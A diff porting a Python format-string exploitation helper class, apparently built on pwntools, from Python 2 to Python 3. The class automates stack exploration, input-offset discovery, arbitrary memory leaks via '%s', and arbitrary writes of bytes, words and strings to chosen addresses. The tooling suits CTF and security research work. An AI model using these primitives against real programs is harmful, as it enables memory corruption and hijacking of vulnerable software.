@@ -64,9 +64,9 @@ class FormatString:
         self.bits = bits
         self.endian = endian
         self.elf = elf
-        self.exec_fmt = exec_fmt
+        self._exec_fmt = exec_fmt
         self.max_explore = max_explore
-        self.bad_chars = bad_chars
+        self.bad_chars = auto_bytes(bad_chars)
 
         # Might want to change this sometime...
         self.padChar = "C"
@@ -82,7 +82,7 @@ class FormatString:
         # The ELF will override the other options
         if elf is not None:
             if type(elf) is not pwnlib.elf.elf.ELF:
-                log.warn("ELF argument is wrong type. Expecting pwnlib.elf, got {0}. Ignoring for now.".format(type(elf)))
+                log.warning("ELF argument is wrong type. Expecting pwnlib.elf, got {0}. Ignoring for now.".format(type(elf)))
 
             else:
                 self.arch = elf.arch
@@ -95,7 +95,7 @@ class FormatString:
         if self.index != None:
             # If no pad specified, default to 0
             if self.pad == None:
-                log.warn("Index specified but no pad specified. Defaulting to 0.")
+                log.warning("Index specified but no pad specified. Defaulting to 0.")
                 self.pad = 0
         
         else:
@@ -105,6 +105,9 @@ class FormatString:
         if explore_stack:
             self._exploreStack()
 
+    def exec_fmt(self, fmt):
+        return auto_bytes(self._exec_fmt(fmt))
+
     def _intToStr(self,i):
         """Converts integer to it's corresponding ASCII string representation"""
         
@@ -122,7 +125,7 @@ class FormatString:
         if self.endian == 'little':
             s = s[::-1]
 
-        return s
+        return s.encode('latin-1')
 
 
     def _isPrintableString(self,s):
@@ -209,7 +212,7 @@ class FormatString:
     def _exploreStack(self):
         """Explore what pointers and data already exists on the stack."""
 
-        wordSize = self.bits / 8
+        wordSize = int(self.bits / 8)
         
         # Assuming 0 pad if we haven't found one yet...
         # TODO: Could create a heuristic find to get a better idea of the correct pad.
@@ -219,15 +222,13 @@ class FormatString:
         for i in range(1,self.max_explore):
             s = "{2}{0}%{1}$p{0}".format("J"*wordSize,i,"C"*pad)
             out = self.exec_fmt(s)
-            out = out[out.index("J"*wordSize)+wordSize:]
-            out = out[:out.index("J"*wordSize)]
-            if out == "" or "(nil)" in out:
+            out = out[out.index(b"J"*wordSize)+wordSize:]
+            out = out[:out.index(b"J"*wordSize)]
+            if out == b"" or b"(nil)" in out:
                 self.stack.append(0)
             else:
                 self.stack.append(int(out,16))
 
-        
-
     def _findIndex(self):
         """Figure out where our input starts as well as other information automatically.
         
@@ -241,7 +242,7 @@ class FormatString:
         discovered = False
         
         # How big should our search words be?
-        wordSize = self.bits / 8
+        wordSize = int(self.bits / 8)
 
         # Change our output type based on the size we're looking for
         if self.bits == 32:
@@ -263,14 +264,14 @@ class FormatString:
             for pad in range(wordSize):
 
                 output = self.exec_fmt("{2}{0}%{3}$0{1}{4}".format(testInput,wordSize*2,padChar * pad,index,outType))
-                outputHex = output.split(testInput)[1][:wordSize*2] # grab the hex
+                outputHex = output.split(testInput.encode('latin-1'))[1][:wordSize*2] # grab the hex
 
                 # If this is the base print, lets find the number of bytes written before us
                 if index == 1 and pad == 0:
-                    self.already_written = len(output.split(testInput)[0])
+                    self.already_written = len(output.split(testInput.encode('latin-1'))[0])
 
                 # Check if we found it
-                if unhexlify(outputHex)[::-1] == testInput:
+                if unhexlify(outputHex)[::-1] == testInput.encode('latin-1'):
                     discovered = True
                     break
             
@@ -284,7 +285,7 @@ class FormatString:
             self.pad = pad
 
         else:
-            log.warn("Failed to find offset to our input! You will have reduced functionality.")
+            log.warning("Failed to find offset to our input! You will have reduced functionality.")
 
     def _leak(self,addr):
         """Given an addr, leak that memory as raw string.
@@ -305,7 +306,7 @@ class FormatString:
 
 
         """
-        wordSize = self.bits / 8
+        wordSize = int(self.bits / 8)
 
         # TODO: Randomize guard?
         guard = "J"*wordSize
@@ -335,14 +336,13 @@ class FormatString:
             # TODO: To simplify things, I give us generically 3 characters (upto index 999) to work with. This might not be desired in some cases. Maybe re-write this later to be more efficient
 
             # Real index takes into account that our own input is moving this around
-            sLineSize = int(wordSize * round(float(6)/wordSize)) / wordSize
+            sLineSize = int(int(wordSize * round(float(6)/wordSize)) / wordSize)
             realIndex = self.index + 2 + sLineSize
             sLine = "%{0}$s".format(str(realIndex).rjust(3,"0"))
             sLine = sLine + "J" * (wordSize - (len(sLine) % wordSize)) if (len(sLine) % wordSize) != 0 else sLine # Pad it out to a word length
         
-
             # Put it together
-            fmt = "{0}{1}{2}{4}{3}".format(self.padChar*self.pad,guard,sLine,addr,guard)
+            fmt = "{0}{1}{2}{4}{3}".format(self.padChar*self.pad,guard,sLine,addr.decode('latin-1'),guard)
 
         # See if we have this address in the stack
         elif addr in self.stack:
@@ -362,12 +362,12 @@ class FormatString:
             return None
         
         # Split out the output
-        out = out[out.index(guard) + len(guard):]
-        out = out[:out.index(guard)]
+        out = out[out.index(guard.encode('latin-1')) + len(guard):]
+        out = out[:out.index(guard.encode('latin-1'))]
 
         # Since we're printing strings, let's assume it's a null
-        if out == "":
-            out = "\x00"
+        if out == b"":
+            out = b"\x00"
 
         return out
 
@@ -378,7 +378,7 @@ class FormatString:
 
         Parameters
         ----------
-        s : int or str
+        s : int or str or bytes
             Input to be checked for bad characters.
 
         
@@ -441,8 +441,7 @@ class FormatString:
             log.error("Unknown endian type {}".format(self.endian))
             return None
 
-        return pack("{0}{1}".format(endian_str,bits_str),val)
-
+        return pack("{0}{1}".format(endian_str,bits_str),val).decode('latin-1')
 
     def write_byte(self,addr,val):
         """write a single byte of data at addr
@@ -474,7 +473,7 @@ class FormatString:
         endian_dir = "<" if self.endian is 'little' else ">"
         
         # For proper alignment
-        pointer_len = self.bits/8
+        pointer_len = int(self.bits/8)
         
         # Change string to int
         if type(val) is str:
@@ -483,7 +482,7 @@ class FormatString:
                 return None
 
             # Change it to int
-            val = unpack("{0}B".format(endian_dir),val)[0]
+            val = unpack("{0}B".format(endian_dir),val.encode('latin-1'))[0]
 
         elif val > 0xff:
             log.error("Attempting to write more than one byte. Use different write call.")
@@ -510,7 +509,7 @@ class FormatString:
         assert size % pointer_len == 0
         
         # Adjust index
-        index_updated = self.index + (size / pointer_len)
+        index_updated = self.index + int(size / pointer_len)
 
         fmt = fmt.format(str(index_updated).rjust(3,"0"))
 
@@ -523,7 +522,6 @@ class FormatString:
 
         self.exec_fmt(fmt)
 
-
     def write_word(self,addr,val):
         """write a word of data at addr
 
@@ -551,7 +549,7 @@ class FormatString:
                 log.error("Write word expects string of length 2, got length {0}".format(len(val)))
                 return None
             
-            val = unpack("{0}H".format(endian_dir),val)[0]
+            val = unpack("{0}H".format(endian_dir),val.encode('latin-1'))[0]
 
         elif val > 0xffff:
             log.error("Input value is larger than word size (0xffff)")
@@ -580,8 +578,8 @@ class FormatString:
 
         """
 
-        assert type(val) in [int,long]
-        assert type(addr) in [int,long]
+        assert type(val) in [int]
+        assert type(addr) in [int]
         assert type(n) is int
 
         # Check for chars we don't like
@@ -590,7 +588,7 @@ class FormatString:
 
         endian_dir = "<" if self.endian is "little" else ">"
 
-        pointer_len = self.bits/8
+        pointer_len = int(self.bits/8)
 
         # TODO: Assuming pad of 0. Need to implement heuristic to guess a better pad.
         pad = self.pad or 0
@@ -645,7 +643,7 @@ class FormatString:
         fmt += "J"*pad_after
 
         # Update our addr index
-        index_updated = index + (size / pointer_len)
+        index_updated = index + int(size / pointer_len)
 
         # Going to dynamically build the pythong format args
         fmt_format = []
@@ -698,7 +696,7 @@ class FormatString:
                 log.error("Write dword expects string of length 4, got length {0}".format(len(val)))
                 return None
 
-            val = unpack("{0}I".format(endian_dir),val)[0]
+            val = unpack("{0}I".format(endian_dir),val.encode('latin-1'))[0]
 
         elif val > 0xffffffff:
             log.error("Input value is larger than dword size (0xffffffff)")
@@ -723,7 +721,7 @@ class FormatString:
 
         """
 
-        assert type(val) in [int,str,long]
+        assert type(val) in [int,str]
         assert type(addr) is int
         
         endian_dir = "<" if self.endian is "little" else ">"
@@ -733,7 +731,7 @@ class FormatString:
                 log.error("Write qword expects string of length 8, got length {0}".format(len(val)))
                 return None
 
-            val = unpack("{0}Q".format(endian_dir),val)[0]
+            val = unpack("{0}Q".format(endian_dir),val.encode('latin-1'))[0]
 
         elif val > 0xffffffffffffffff:
             log.error("Input value is larger than dword size (0xffffffffffffffff)")
@@ -748,19 +746,17 @@ class FormatString:
         ----------
         addr : int
             Address to start writing the string to
-        s : str
+        s : str, bytes
             String to write to address
 
 
-
         This call will attempt to write the string provided into the address
         provided. It does this by turning the string into a large number and
         writing the large number.
-
         """
         
-        assert type(addr) in [int, long]
-        assert type(s) is str
+        assert type(addr) in [int]
+        assert type(s) in [str, bytes]
 
         # Adjust for endianess
         if self.endian == 'little':
@@ -770,8 +766,11 @@ class FormatString:
         if len(s) % 2 != 0:
             words += 1
 
+        s = auto_bytes(s)
+
         # Need to convert it to an integer?
-        self.write_n_words(addr,int(s.encode('hex'),16),words)
+        #self.write_n_words(addr,int(s.encode('hex'),16),words)
+        self.write_n_words(addr,int(codecs.encode(s, "hex"),16),words)
 
     def write_b(self,addr,val):
         """Wraps the ``write_byte`` call"""
@@ -802,8 +801,11 @@ class FormatString:
 
 import logging
 log = logging.getLogger('FormatString')
+import codecs
 from binascii import unhexlify
 from struct import pack, unpack
 from prettytable import PrettyTable
 import string
 from itertools import groupby
+
+from .helpers import auto_bytes
